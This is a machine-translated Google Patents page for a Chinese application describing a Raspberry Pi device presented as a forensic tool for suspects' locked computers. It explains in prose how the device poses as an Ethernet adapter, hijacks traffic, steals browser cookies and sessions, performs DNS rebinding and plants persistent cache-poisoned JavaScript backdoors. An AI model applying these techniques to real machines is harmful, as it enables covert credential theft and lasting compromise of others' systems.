CN107819862A - Swift electron evidence collecting method, device and electronic equipment based on Raspberry Pi - Google Patents

Swift electron evidence collecting method, device and electronic equipment based on Raspberry Pi Download PDF

Info

Publication number
CN107819862A
CN107819862A CN201711134861.9A CN201711134861A CN107819862A CN 107819862 A CN107819862 A CN 107819862A CN 201711134861 A CN201711134861 A CN 201711134861A CN 107819862 A CN107819862 A CN 107819862A
Authority
CN
China
Prior art keywords
goal systems
information
routing iinformation
raspberry
suspect
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN201711134861.9A
Other languages
Chinese (zh)
Inventor
章叶军
范渊
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
DBAPPSecurity Co Ltd
Original Assignee
DBAPPSecurity Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by DBAPPSecurity Co Ltd filed Critical DBAPPSecurity Co Ltd
Priority to CN201711134861.9A priority Critical patent/CN107819862A/en
Publication of CN107819862A publication Critical patent/CN107819862A/en
Pending legal-status Critical Current

Links

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L67/00Network arrangements or protocols for supporting network services or applications
    • H04L67/01Protocols
    • H04L67/02Protocols based on web technology, e.g. hypertext transfer protocol [HTTP]
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441Countermeasures against malicious traffic
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L67/00Network arrangements or protocols for supporting network services or applications
    • H04L67/50Network services
    • H04L67/535Tracking the activity of the user

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • General Engineering & Computer Science (AREA)
  • Computing Systems (AREA)
  • Management, Administration, Business Operations System, And Electronic Commerce (AREA)

Abstract

The invention provides a kind of swift electron evidence collecting method, device and electronic equipment based on Raspberry Pi, this method includes:Kidnap the networking traffic for the goal systems being under screen lock state;The cookie information and routing iinformation of goal systems are stolen based on networking traffic;According to cookie information and routing iinformation, attack is bound to goal systems by outbound modes again, to obtain target information.In the method for the present invention, the startup password of goal systems need not be cracked, but by the way that Raspberry Pi is inserted on the computer of suspect, Raspberry Pi just can kidnap the networking traffic of suspect's computer, and then steal the cookie information and routing iinformation of suspect's computer, attack is bound again to suspect's computer, just the information related to suspect's crime can be obtained, the process of the electronic evidence-collecting is simple, fast, effective support is provided for the solving criminal cases work for the personnel that collect evidence, alleviating existing electronic evidence-collecting method, time-consuming, the low technical problem of efficiency.

Description

Swift electron evidence collecting method, device and electronic equipment based on Raspberry Pi
Technical field
The present invention relates to the technical field of electronic evidence-collecting, more particularly, to a kind of swift electron evidence obtaining side based on Raspberry Pi Method, device and electronic equipment.
Background technology
G pacifies special Z teams needs quick obtaining suspect locking internet records on computers and session letter in some cases Breath, its tissue is given as suspect just have sent a important materials by mail, G, which pacifies special Z team member, to be needed to grasp in mail in time Hold and it organizes addresses of items of mail.
At present, G pacifies special Z teams when obtaining suspect's locking information on computers, it is necessary first to computer cipher is cracked, for For Windows systems, by creative management person's account in the secure mode or PE system-kill passwords can be passed through;Apple System can boot up password modification into recovery patterns, recycle specific forensic tools (such as UrlViewer, one kind Concerning security matters inspection, electronic evidence-collecting aid) obtain the internet records of suspect.
And solved a case for special Z, punishment Z, it is most important that the time, traditional electronic evidence-collecting method need the regular hour into This, if suspect has certain counterreconnaissance consciousness, can also set the password protection mechanism of complexity, so undoubtedly can be to investigating work Cause no small resistance.
To sum up, traditional electronic evidence-collecting method needs first to crack computer cipher, then recycles the forensic tools of specialty to enter Row electronic evidence-collecting, time-consuming, and efficiency is low.
The content of the invention
In view of this, it is an object of the invention to provide a kind of swift electron evidence collecting method based on Raspberry Pi, device and Electronic equipment, to alleviate existing electronic evidence-collecting method, time-consuming, the low technical problem of efficiency.
In a first aspect, the embodiments of the invention provide a kind of swift electron evidence collecting method based on Raspberry Pi, applied to tree The certain kind of berries sends end, and methods described includes:
The networking traffic for the goal systems being under screen lock state is kidnapped, wherein, the goal systems is suspect System;
The cookie information and routing iinformation of the goal systems are stolen based on the networking traffic;
According to the cookie information and the routing iinformation, weight is carried out to the goal systems by outbound modes Binding attack, to obtain target information, and the target information is sent to the terminal of evidence obtaining personnel, wherein, the target letter Cease for the information related to suspect's crime.
With reference in a first aspect, the embodiments of the invention provide the possible embodiment of the first of first aspect, wherein, Attack is bound according to the cookie information and the routing iinformation again by outbound modes, to obtain target information Afterwards, methods described also includes:
In the network environment of the goal systems force caching back door so that the evidence obtaining personnel by access it is described after Door obtains the target information.
With reference in a first aspect, the embodiments of the invention provide the possible embodiment of second of first aspect, wherein, rob Holding the networking traffic of the goal systems under screen lock state includes:
The goal systems is accessed according to the access operation of the evidence obtaining personnel, with the false Ethernet that disguises oneself as;
The goal systems is accessed into the false Ethernet, to kidnap the networking traffic of the goal systems.
With reference in a first aspect, the embodiments of the invention provide the possible embodiment of the third of first aspect, wherein, base Stealing the cookie information of the goal systems and routing iinformation in the networking traffic includes:
After the goal systems sends access request by browser, the visit is monitored based on the networking traffic Ask the access response of request and the access request;
The cookie information and routing iinformation of the goal systems are obtained based on the access request and the access response,
Wherein, the cookie information includes the id information goal systems when conducting interviews, encrypted message and net Page information;The routing iinformation is the routing information that the goal systems is passed through when conducting interviews, and the routing information is at least Including following any:Internal IP, node server, label.
With reference in a first aspect, the embodiments of the invention provide the possible embodiment of the 4th of first aspect kind, wherein, Caching back door is forced in the network environment of the goal systems, so that the evidence obtaining personnel are by accessing described in the back door acquisition Target information includes:
Kidnap the LAN routing iinformation being connected with the goal systems;
Destination server is determined according to the LAN routing iinformation, wherein, the destination server is and the local The server corresponding with target routing iinformation in net routing iinformation, the target routing iinformation are the LAN routing iinformation The best information of middle performance;
Caching back door is forced on the destination server, is attacked with generating permanent heavy binding;
The target information is obtained based on the permanent heavy binding attack.
Second aspect, the embodiment of the present invention additionally provide a kind of swift electron apparatus for obtaining evidence based on Raspberry Pi, are applied to Raspberry Pi end, described device include:
Module is kidnapped, for kidnapping the networking traffic for the goal systems being under screen lock state, wherein, the target System is suspect's system;
Module is stolen, the cookie information and route for being stolen the goal systems based on the networking traffic are believed Breath;
Binding attack module again, for according to the cookie information and the routing iinformation, passing through outbound modes Attack is bound again to the goal systems, to obtain target information, and the target information is sent to evidence obtaining personnel's Terminal, wherein, the target information is the information related to suspect's crime.
With reference to second aspect, the embodiments of the invention provide the possible embodiment of the first of second aspect, wherein, institute Stating device also includes:
Back door cache module, for forcing caching back door in the network environment of the goal systems, so that the evidence obtaining Personnel obtain the target information by accessing the back door.
With reference to second aspect, the embodiments of the invention provide the possible embodiment of second of second aspect, wherein, institute Stating abduction module includes:
First access unit, for accessing the goal systems according to the access operation of the evidence obtaining personnel, to disguise oneself as False Ethernet;
Second access unit, for the goal systems to be accessed into the false Ethernet, to kidnap the goal systems Networking traffic.
With reference to second aspect, the embodiments of the invention provide the possible embodiment of the third of second aspect, wherein, institute State and steal module and include:
Monitoring unit, after in the goal systems by browser transmission access request, based on the network connection Flow monitors the access response of the access request and the access request;
First acquisition unit, for obtaining the goal systems based on the access request and the access response Cookie information and routing iinformation, wherein, the cookie information includes the id information goal systems when conducting interviews, Encrypted message and info web;The routing iinformation is the routing information that the goal systems is passed through when conducting interviews, described Routing information comprises at least following any:Internal IP, node server, label.
The third aspect, the embodiment of the present invention additionally provide a kind of electronic equipment, including memory, processor, the storage The computer program that can be run on the processor is stored with device, is realized described in the computing device during computer program The step of method described in above-mentioned first aspect.
The embodiment of the present invention brings following beneficial effect:The embodiments of the invention provide a kind of based on the quick of Raspberry Pi Electronic evidence-collecting method, device and electronic equipment, this method are applied to Raspberry Pi end, including:Kidnap the mesh being under screen lock state The networking traffic of mark system, wherein, goal systems is suspect's system;Goal systems is stolen based on networking traffic Cookie information and routing iinformation;According to cookie information and routing iinformation, goal systems is carried out by outbound modes Binding attack again, to obtain target information, and target information is sent to the terminal of evidence obtaining personnel, wherein, target information be with The related information of suspect's crime.
Traditional electronic evidence-collecting method is when carrying out electronic evidence-collecting, it is necessary to first crack computer cipher, and then recycling is professional Forensic tools carry out electronic evidence-collecting, the process for cracking computer cipher expends time length, and the efficiency of electronic evidence-collecting is low.With tradition Electronic evidence-collecting method compare, in the swift electron evidence collecting method of the invention based on Raspberry Pi, Raspberry Pi by kidnap be in The networking traffic of goal systems under screen lock state steals the cookie information and routing iinformation of goal systems, and then according to Cookie information and routing iinformation are bound attack to goal systems again by outbound modes, to obtain target information, And target information is sent to the terminal of evidence obtaining personnel.In the swift electron evidence collecting method based on Raspberry Pi of the present invention, without The startup password of goal systems (i.e. suspect's computer) is cracked, but by the way that Raspberry Pi is inserted on the computer of suspect, raspberry Group just can kidnap the networking traffic of suspect's computer, and then steal the cookie information and route letter of suspect's computer Breath, finally, attack is bound to suspect's computer, just can obtain the information related to suspect's crime, the electronics takes again The process of card is simple, fast, provides effective support for the solving criminal cases work for the personnel that collect evidence, alleviates existing electronics and take Time-consuming for card method, the low technical problem of efficiency.
Other features and advantages of the present invention will illustrate in the following description, also, partly become from specification Obtain it is clear that or being understood by implementing the present invention.The purpose of the present invention and other advantages are in specification, claims And specifically noted structure is realized and obtained in accompanying drawing.
To enable the above objects, features and advantages of the present invention to become apparent, preferred embodiment cited below particularly, and coordinate Appended accompanying drawing, is described in detail below.
Brief description of the drawings
, below will be to specific in order to illustrate more clearly of the specific embodiment of the invention or technical scheme of the prior art The required accompanying drawing used is briefly described in embodiment or description of the prior art, it should be apparent that, in describing below Accompanying drawing is some embodiments of the present invention, for those of ordinary skill in the art, before creative work is not paid Put, other accompanying drawings can also be obtained according to these accompanying drawings.
Fig. 1 is a kind of flow chart of the swift electron evidence collecting method based on Raspberry Pi provided in an embodiment of the present invention;
Fig. 2 is the side of the networking traffic of the goal systems provided in an embodiment of the present invention kidnapped and be under screen lock state Method flow chart;
Fig. 3 is the cookie information and route provided in an embodiment of the present invention that goal systems is stolen based on networking traffic The method flow diagram of information;
Fig. 4 forces caching back door to be provided in an embodiment of the present invention in the network environment of goal systems, so that evidence obtaining people Member obtains the method flow diagram of target information by accessing back door;
Fig. 5 is a kind of structured flowchart of the swift electron apparatus for obtaining evidence based on Raspberry Pi provided in an embodiment of the present invention;
Fig. 6 is the schematic diagram of a kind of electronic equipment provided in an embodiment of the present invention.
Icon:
20- kidnaps module;21- steals module;22- binds attack module again.
Embodiment
To make the purpose, technical scheme and advantage of the embodiment of the present invention clearer, below in conjunction with accompanying drawing to the present invention Technical scheme be clearly and completely described, it is clear that described embodiment is part of the embodiment of the present invention, rather than Whole embodiments.Based on the embodiment in the present invention, those of ordinary skill in the art are not making creative work premise Lower obtained every other embodiment, belongs to the scope of protection of the invention.
For ease of understanding the present embodiment, first to a kind of based on the fast of Raspberry Pi disclosed in the embodiment of the present invention Fast electronic evidence-collecting method describes in detail.
Embodiment one:
A kind of swift electron evidence collecting method based on Raspberry Pi, applied to Raspberry Pi end, with reference to figure 1, this method includes:
S102, the networking traffic for kidnapping the goal systems being under screen lock state, wherein, goal systems is suspect System;
In embodiments of the present invention, the executive agent of this method is Raspberry Pi, and the Raspberry Pi is used to collect evidence, it is possible to claims For Raspberry Pi of collecting evidence.
First Raspberry Pi and electronic evidence-collecting are simply introduced below:Raspberry Pi is a microcomputer based on ARM Mainboard, using SD/MicroSD cards as memory hard disk, there are 1/2/4 USB interface and 10/100 Ethernet around card mainboard Interface, while possess wireless interface module and bluetooth module, a master only more slightly larger than credit card is all incorporated into upper-part On plate, possesses all PC basic function.
Electronic evidence-collecting refers to utilize computer hardware technique, to computer intrusion, broken in a manner of meeting legal norm The criminal offences such as bad, fraud, attack carry out evidence acquisition, preservation, the process analyzed and shown.In terms of technical elements, computer Crime evidence obtaining is one and suspect's system is scanned and cracked, the process rebuild to crime dramas.Specifically, it is Refer to and computer regarded as scene of a crime, with advanced discrimination technology, computer crime behavior is dissected, search criminal and Its evidence of crime.
Specifically, goal systems is suspect's system, in particular to suspect's computer.Screen lock state refers to suspect's computer In open state, but because suspect is provided with startup password, its computer can not be operated, as screen lock state. Certainly, the method in the embodiment of the present invention is also applied for the suspect's computer being under non-screen lock state, the embodiment of the present invention pair It is not particularly limited.
In addition, kidnapping the process of networking traffic will hereinafter be specifically described, will not be repeated here.
S104, the cookie information and routing iinformation for stealing based on networking traffic goal systems;
After the networking traffic of goal systems is kidnapped, depositing in goal systems can be just stolen based on networking traffic The cookie information and routing iinformation being stored in browser.Specifically, website pond inside Raspberry Pi be present, included in the website pond There is the website that evidence obtaining personnel are concerned about.For example evidence obtaining personnel want to obtain suspect's system in nets such as Baidu, Facebook, Taobaos Information on standing, then, just include these websites in the website pond.In practice, the website in the website pond generally comprises 1,000,000 website, the embodiment of the present invention are not particularly limited to it before www.alexa.cn rankings.
When suspect's system login to Baidu, Facebook, behind these websites of Taobao, Raspberry Pi is inserted into suspect's computer After upper, with regard to cookie information and routing iinformation of suspect's system on these websites can be acquired.
Specifically, when suspect's system login refers to Baidu, Facebook, these websites of Taobao:When suspect is previous Carve and these three websites are signed in by browser, then, later moment in time suspect closes browser, does not click on and exits, Suspect's computer is in the state logged on these three websites so in the case of this kind, still can get suspect system System is on the cookie information and routing iinformation on these three websites.
That is, behind suspect's computer logged major website, when suspect's computer does not exit major website, But in the case of closing browser only, Raspberry Pi still can obtain cookie information of suspect's computer in major website And routing iinformation.
S106, according to cookie information and routing iinformation, goal systems is bound again by outbound modes and attacked Hit, to obtain target information, and target information is sent to the terminal of evidence obtaining personnel, wherein, target information is and suspicion criminal Guilty related information.
After cookie information and routing iinformation is obtained, Raspberry Pi can be carried out by outbount modes to goal systems Binding attack again, and then target information is acquired, and target information is sent to the terminal of evidence obtaining personnel.Specifically, tie up again Fixed attack can be that WebSocket or DNS binds attack again.
Traditional electronic evidence-collecting method is when carrying out electronic evidence-collecting, it is necessary to first crack computer cipher, and then recycling is professional Forensic tools carry out electronic evidence-collecting, the process for cracking computer cipher expends time length, and the efficiency of electronic evidence-collecting is low.With tradition Electronic evidence-collecting method compare, in the swift electron evidence collecting method of the invention based on Raspberry Pi, Raspberry Pi by kidnap be in The networking traffic of goal systems under screen lock state steals the cookie information and routing iinformation of goal systems, and then according to Cookie information and routing iinformation are bound attack to goal systems again by outbound modes, to obtain target information, And target information is sent to the terminal of evidence obtaining personnel.In the swift electron evidence collecting method based on Raspberry Pi of the present invention, without The startup password of goal systems (i.e. suspect's computer) is cracked, but by the way that Raspberry Pi is inserted on the computer of suspect, raspberry Group just can kidnap the networking traffic of suspect's computer, and then steal the cookie information and route letter of suspect's computer Breath, finally, attack is bound to suspect's computer, just can obtain the information related to suspect's crime, the electronics takes again The process of card is simple, fast, provides effective support for the solving criminal cases work for the personnel that collect evidence, alleviates existing electronics and take Time-consuming for card method, the low technical problem of efficiency.
The above describes the process for carrying out electronic evidence-collecting to suspect's computer first, and when first, electronic evidence-collecting is completed Afterwards, Raspberry Pi can also be operated further, and the further operation can facilitate the later stage to be carried out again to suspect's computer Electronic evidence-collecting.
Alternatively, attack is being bound according to cookie information and routing iinformation again by outbound modes, to obtain After obtaining target information, this method also includes:
Caching back door is forced in the network environment of goal systems, so that evidence obtaining personnel obtain target letter by accessing back door Breath.
After target information is got, caching is further forced in the network environment of goal systems (i.e. suspect's computer) Back door so that evidence obtaining personnel's later stage again to suspect's system carry out electronic evidence-collecting when, can directly by access back door obtain mesh Information is marked, that is, no longer needs grafting Raspberry Pi so that the electronic evidence-collecting work in later stage is more convenient, fast.
It is, caching back door is related to thousands of individual domain names and general javascript CDN links, user cookie is used Realize that long-range HTTP GET or POST modes control connection to rear end domain name, it is not necessary to goal systems unlocks, after removing Raspberry Pi, Back door keeps effective.
The above has carried out overall introduction to the swift electron evidence collecting method based on Raspberry Pi, below to being directed to Particular content describe in detail.
Alternatively, with reference to figure 2, kidnapping the networking traffic for the goal systems being under screen lock state includes:
S201, the access operation access goal systems according to evidence obtaining personnel, with the false Ethernet that disguises oneself as;
Raspberry Pi is covered all Windows and Mac systems, once insertion computer, will pretend to be modeled to the false ether newly added Net connection, even if suspect uses WIFI, suspect's System Priority can be equally set to access the false Ethernet of its camouflage.Raspberry Group utilizes man-in-the-middle attack mode, can kidnap the all-network flow for monitoring suspect, steals and is stored in appointing in browser Anticipate cookie and session, is then sent to server controls end (terminals for the personnel that collect evidence).
S202, goal systems accessed into false Ethernet, to kidnap the networking traffic of goal systems.
Specifically, evidence obtaining personnel insert Raspberry Pi to the suspect's system for having cryptoguard and screen locking;Raspberry Pi will Simulation disguises oneself as a new false Ethernet for adding system, under default situations, even in having under the screen lock state of cryptoguard, Windows, OS X and linux system will identify that the false network connects, and send DHCP request;
Raspberry Pi responds DHCP request, and provides one group by construction, from 0.0.0.0 to 255.255.255.255, with tree The certain kind of berries sends the random IP address that equipment is same subnet to combine;Generally, in the case where suspect's system is connected using existing network, The addition of one complementary network connection, suspect's system can be defaulted as it on low priority network, and be continuing with original net Network diagram closes.But based on " in the case of Internet traffic " " LANtraffic ", any routing table/gateway is preferential Level/network interface service order sets and can be all bypassed, and can all not consider, so, Raspberry Pi is by changing former network connection Gateway address, flow is introduced itself, and then kidnap suspect's system all-network flow.
Further, with reference to figure 3, the cookie information and routing iinformation bag of goal systems are stolen based on networking traffic Include:
S301, goal systems by browser send access request after, based on networking traffic snoop accesses ask With the access response of access request;
Specifically, as long as goal systems operation has browser, AJAX or dynamic script framework will be passed through by opening webpage (script/iframes) various requests are produced, and because goal systems network traffics are kidnapped completely, Raspberry Pi will be monitored To all HTTP requests and response, and send such content to the web services end (Node.js) of Raspberry Pi;Even if DNS service Device points to other internal IP, because these internal dns servers will produce public ip address for the domain name of caching, and these IP Location is kidnapped by Raspberry Pi, so attack is still effective;
S302, cookie information and routing iinformation based on access request and access response acquisition goal systems, wherein, Cookie information includes id information goal systems when conducting interviews, encrypted message and info web;Routing iinformation is target The routing information that system is passed through when conducting interviews, routing information comprise at least following any:Internal IP, node server, Label.
Specifically, when Node web servers receive request, Raspberry Pi can be carried out by HTML or Javascript Respond (many websites can load HTML or JS in background request);
Then, the HTML/JS-agnostic pages can generate many hiding iframe, include again in each iframe Different web sites in 1,000,000 before Alexa rankings.
Further, with reference to figure 4, caching back door is forced in the network environment of goal systems, so that evidence obtaining personnel pass through Accessing back door acquisition target information includes:
The LAN routing iinformation that S401, abduction are connected with goal systems;
Specifically, the LAN routing iinformation of current network can be kidnapped based on networking traffic Raspberry Pi.
S402, destination server determined according to LAN routing iinformation, wherein, destination server is and LAN route is believed The server corresponding with target routing iinformation in breath, target routing iinformation are the letter that performance is best in LAN routing iinformation Breath;
After LAN routing iinformation is obtained, the best routing iinformation of performance is determined in LAN routing iinformation, is made For target routing iinformation, then using in the corresponding server of target routing iinformation as destination server.
S403, caching back door is forced on destination server, attacked with generating permanent heavy binding;
Specifically, Raspberry Pi caches back door by being forced on a particular host (i.e. destination server), specifically, " .ip.raspberry " is added behind the IP of destination server, such as 192.168.0.1.ip.raspberry, it is possible to generate One permanent DNS binds attack again.When using Raspberry Pi as dns server (suspect uses public dns server), Raspberry Pi is responded using interim special IP (1.0.0.1), it means that now any request will all have access to Raspberry Pi Web server.If dns server is arranged to internal network (such as 192.168.0.x), 1.0.0.1.pin.ip.raspberry A request by construction is sent, after several seconds, it will appoint to special dns server (public network) return of evidence obtaining personnel IP address information in meaning [ip.address] .ip.raspberry.Then, Raspberry Pi will be in http:// 192.168.0.1.ip.raspberry/raspberry it is upper that a back door is quickly set, and will be pointed in Raspberry Pi 1.0.0.1, the back door will be realized and be accessed from Raspberry Pi equipment;
DNS pinning and DNS rebinding security are set, due to making the websites of Alexa top100 ten thousand before Ask and exhaust DNS pinning tables, be most bypassed at last.Afterwards, DNS avoids the need for binding again so that the attack can be with Last very long;
S404, based on it is permanent it is heavy binding attack obtain target information.
Specifically, back door forces to be connected to http:// 192.168.0.1.ip.raspberry/raspberry is any right 192.168.0.1.ip.raspberry request will all have access to unpinned IP address, cause router parsing directly to refer to To 192.168.0.1;
This means if 192.168.0.1.ip.raspberry Raspberry Pis are remotely loaded in iframe by back door Point to main frame (i.e. destination server), it is possible to AJAX GET/POST and other any pages are performed to internal router, realized Control internal router completely.
Raspberry Pi instead of thousands of common, the Javascript files based on CDN, such as Google and jQuery CDNs.If a website or domain name are loaded with the CDN Javascript files of infected poisoning, after correct code coordinates Door, it is possible to allow evidence obtaining personnel to realize that invasion accesses;
Because the website domain name of each caching leaves back door, even if current suspect does not perform visit to any domain name Ask, evidence obtaining personnel still can perform homologous request (AJAX GET/POST) with long distance forced rear end browser;
When suspect accesses the website based on HTTP or CDN Javascript Cache Poisonings, back door is just triggered.
The swift electron evidence collecting method based on Raspberry Pi in the embodiment of the present invention has the following advantages that:
The screen locking computer (30 seconds or so) of suspect, and the meeting left by suspect on webpage are cracked in a short time Information is talked about, accesses its browsed page, and back door can be kept permanently effective;It is portable compact micro- using this board of Raspberry Pi Type computer system come complete it is a series of crack work, think that valuable time is got in special Z work.
Embodiment two:
A kind of swift electron apparatus for obtaining evidence based on Raspberry Pi, applied to Raspberry Pi end, with reference to figure 5, the device includes:
Module 20 is kidnapped, for kidnapping the networking traffic for the goal systems being under screen lock state, wherein, target system Unite as suspect's system;
Module 21 is stolen, for stealing the cookie information and routing iinformation of goal systems based on networking traffic;
Binding attack module 22 again, for according to cookie information and routing iinformation, by outbound modes to target System is bound attack again, to obtain target information, and target information is sent to the terminal of evidence obtaining personnel, wherein, target Information is the information related to suspect's crime.
In the swift electron apparatus for obtaining evidence based on Raspberry Pi of the present invention, Raspberry Pi is under screen lock state by kidnapping The networking traffic of goal systems steals the cookie information and routing iinformation of goal systems, so according to cookie information and Routing iinformation is bound attack to goal systems again by outbound modes, to obtain target information, and by target information Send to the terminal of the personnel of evidence obtaining.In the swift electron apparatus for obtaining evidence based on Raspberry Pi of the present invention, without cracking goal systems The startup password of (i.e. suspect's computer), but by the way that Raspberry Pi is inserted on the computer of suspect, Raspberry Pi just can kidnap The networking traffic of suspect's computer, and then the cookie information and routing iinformation of suspect's computer are stolen, finally, to suspicion People's computer is bound attack again, just can obtain the information related to suspect's crime, the process of the electronic evidence-collecting is simple, soon Victory, effective support is provided for the solving criminal cases work for the personnel that collect evidence, alleviating existing electronic evidence-collecting method, time-consuming, effect The low technical problem of rate.
Alternatively, the device also includes:
Back door cache module, for forcing caching back door in the network environment of goal systems, so that evidence obtaining personnel pass through Access back door and obtain target information.
Alternatively, kidnapping module includes:
First access unit, for accessing goal systems according to the access operation of evidence obtaining personnel, with the false ether that disguises oneself as Net;
Second access unit, for goal systems to be accessed into false Ethernet, to kidnap the network connecting stream of goal systems Amount.
Alternatively, stealing module includes:
Monitoring unit, for after goal systems sends access request by browser, being monitored based on networking traffic The access response of access request and access request;
First acquisition unit, for obtaining the cookie information and route of goal systems based on access request and access response Information, wherein, cookie information includes id information goal systems when conducting interviews, encrypted message and info web;Route Information is the routing information that goal systems is passed through when conducting interviews, and routing information comprises at least following any:Internal IP, section Point server, label.
Embodiment three:
The embodiments of the invention provide a kind of electronic equipment, and with reference to figure 6, the electronic equipment includes:Processor 30, memory 31, bus 32 and communication interface 33, processor 30, communication interface 33 and memory 31 are connected by bus 32;Processor 30 is used In performing the executable module that is stored in memory 31, such as computer program.Computing device is extreme and realizes such as during program The step of method described in embodiment of the method.
Wherein, memory 31 may include high-speed random access memory (RAM, RandomAccessMemory), also may be used Non-labile memory (non-volatile memory), for example, at least a magnetic disk storage can also be included.By at least One communication interface 33 (can be wired or wireless) realizes the communication between the system network element and at least one other network element Connection, can use internet, wide area network, LAN, Metropolitan Area Network (MAN) etc..
Bus 32 can be isa bus, pci bus or eisa bus etc..It is total that bus can be divided into address bus, data Line, controlling bus etc..For ease of representing, only represented in Fig. 6 with a four-headed arrow, it is not intended that an only bus or one The bus of type.
Wherein, memory 31 is used for storage program, and processor 30 is after execute instruction is received, configuration processor, foregoing The method performed by device that the stream process that inventive embodiments any embodiment discloses defines can apply in processor 30, or Person is realized by processor 30.
Processor 30 is probably a kind of IC chip, has the disposal ability of signal.In implementation process, above-mentioned side Each step of method can be completed by the integrated logic circuit of the hardware in processor 30 or the instruction of software form.Above-mentioned Processor 30 can be general processor, including central processing unit (Central Processing Unit, abbreviation CPU), network Processor (Network Processor, abbreviation NP) etc.;It can also be digital signal processor (Digital Signal Processing, abbreviation DSP), application specific integrated circuit (Application Specific Integrated Circuit, referred to as ASIC), ready-made programmable gate array (Field-Programmable Gate Array, abbreviation FPGA) or other are programmable Logical device, discrete gate or transistor logic, discrete hardware components.It can realize or perform in the embodiment of the present invention Disclosed each method, step and logic diagram.General processor can be microprocessor or the processor can also be appointed What conventional processor etc..The step of method with reference to disclosed in the embodiment of the present invention, can be embodied directly in hardware decoding processing Device performs completion, or performs completion with the hardware in decoding processor and software module combination.Software module can be located at Machine memory, flash memory, read-only storage, programmable read only memory or electrically erasable programmable memory, register etc. are originally In the ripe storage medium in field.The storage medium is located at memory 31, and processor 30 reads the information in memory 31, with reference to Its hardware completes the step of above method.
The calculating of the swift electron evidence collecting method based on Raspberry Pi, device and electronic equipment that the embodiment of the present invention is provided Machine program product, including the computer-readable recording medium of program code is stored, the instruction that described program code includes can use In the method described in previous methods embodiment that performs, specific implementation can be found in embodiment of the method, will not be repeated here.
It is apparent to those skilled in the art that for convenience and simplicity of description, the system of foregoing description With the specific work process of device, the corresponding process in preceding method embodiment is may be referred to, will not be repeated here.
In addition, in the description of the embodiment of the present invention, unless otherwise clearly defined and limited, term " installation ", " phase Even ", " connection " should be interpreted broadly, for example, it may be being fixedly connected or being detachably connected, or be integrally connected;Can To be mechanical connection or electrical connection;Can be joined directly together, can also be indirectly connected by intermediary, Ke Yishi The connection of two element internals.For the ordinary skill in the art, with concrete condition above-mentioned term can be understood at this Concrete meaning in invention.
If the function is realized in the form of SFU software functional unit and is used as independent production marketing or in use, can be with It is stored in a computer read/write memory medium.Based on such understanding, technical scheme is substantially in other words The part to be contributed to prior art or the part of the technical scheme can be embodied in the form of software product, the meter Calculation machine software product is stored in a storage medium, including some instructions are causing a computer equipment (can be People's computer, server, or network equipment etc.) perform all or part of step of each embodiment methods described of the present invention. And foregoing storage medium includes:USB flash disk, mobile hard disk, read-only storage (ROM, Read-Only Memory), arbitrary access are deposited Reservoir (RAM, Random Access Memory), magnetic disc or CD etc. are various can be with the medium of store program codes.
In the description of the invention, it is necessary to explanation, term " " center ", " on ", " under ", "left", "right", " vertical ", The orientation or position relationship of the instruction such as " level ", " interior ", " outer " be based on orientation shown in the drawings or position relationship, merely to Be easy to the description present invention and simplify description, rather than instruction or imply signified device or element must have specific orientation, With specific azimuth configuration and operation, therefore it is not considered as limiting the invention.In addition, term " first ", " second ", " the 3rd " is only used for describing purpose, and it is not intended that instruction or hint relative importance.
Finally it should be noted that:Embodiment described above, it is only the embodiment of the present invention, to illustrate the present invention Technical scheme, rather than its limitations, protection scope of the present invention is not limited thereto, although with reference to the foregoing embodiments to this hair It is bright to be described in detail, it will be understood by those within the art that:Any one skilled in the art The invention discloses technical scope in, it can still modify to the technical scheme described in previous embodiment or can be light Change is readily conceivable that, or equivalent substitution is carried out to which part technical characteristic;And these modifications, change or replacement, do not make The essence of appropriate technical solution departs from the spirit and scope of technical scheme of the embodiment of the present invention, should all cover the protection in the present invention Within the scope of.Therefore, protection scope of the present invention described should be defined by scope of the claims.

Claims (10)

1. a kind of swift electron evidence collecting method based on Raspberry Pi, it is characterised in that applied to Raspberry Pi end, methods described bag Include:
The networking traffic for the goal systems being under screen lock state is kidnapped, wherein, the goal systems is suspect's system;
The cookie information and routing iinformation of the goal systems are stolen based on the networking traffic;
According to the cookie information and the routing iinformation, the goal systems is bound again by outbound modes Attack, to obtain target information, and the target information is sent to the terminal of evidence obtaining personnel, wherein, the target information is The information related to suspect's crime.
2. according to the method for claim 1, it is characterised in that lead to according to the cookie information and the routing iinformation Cross outbound modes and bound attack again, after obtaining target information, methods described also includes:
Caching back door is forced in the network environment of the goal systems, so that the evidence obtaining personnel obtain by accessing the back door Take the target information.
3. according to the method for claim 1, it is characterised in that the network for kidnapping the goal systems being under screen lock state connects Connecing flow includes:
The goal systems is accessed according to the access operation of the evidence obtaining personnel, with the false Ethernet that disguises oneself as;
The goal systems is accessed into the false Ethernet, to kidnap the networking traffic of the goal systems.
4. according to the method for claim 1, it is characterised in that the goal systems is stolen based on the networking traffic Cookie information and routing iinformation include:
After the goal systems sends access request by browser, monitoring the access based on the networking traffic please The access response for the access request of summing;
The cookie information and routing iinformation of the goal systems are obtained based on the access request and the access response,
Wherein, the cookie information includes the id information goal systems when conducting interviews, encrypted message and webpage letter Breath;The routing iinformation is the routing information that the goal systems is passed through when conducting interviews, and the routing information comprises at least It is any below:Internal IP, node server, label.
5. according to the method for claim 2, it is characterised in that after forcing caching in the network environment of the goal systems Door, so that the evidence obtaining personnel are included by accessing the back door acquisition target information:
